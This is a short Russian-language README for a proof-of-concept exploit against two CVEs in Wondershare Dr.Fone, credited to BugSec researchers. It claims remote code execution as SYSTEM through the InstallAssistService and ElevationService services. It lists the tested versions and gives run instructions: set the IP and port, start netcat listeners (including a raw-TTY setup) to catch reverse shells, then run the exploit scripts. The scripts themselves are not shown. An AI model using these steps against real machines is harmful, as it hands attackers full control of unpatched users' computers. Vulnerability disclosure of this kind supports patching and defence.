
Эксплойт, подтверждающий концепцию, для CVE-2021-44595 и CVE-2021-44596 в Wondershare Dr.Fone, обеспечивающий удалённое выполнение кода с правами SYSTEM через уязвимые службы.
Нетанель Коэн и Томер Пелед, исследователи безопасности из BugSec.
Пример PoC для эксплуатации Wondershare Dr.Fone.
Dr.Fone — это телефонный набор инструментов, разработанный Wondershare и уязвимый к RCE.
Только имея сетевой доступ, мы можем выполнить удалённый код от имени пользователя SYSTEM.
Уязвимые службы:
InstallAssistService.exe
ElevationService.exe
Протестировано на версиях: 12.0.7, 11.4
Измените IP-адрес и порт и выполните.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py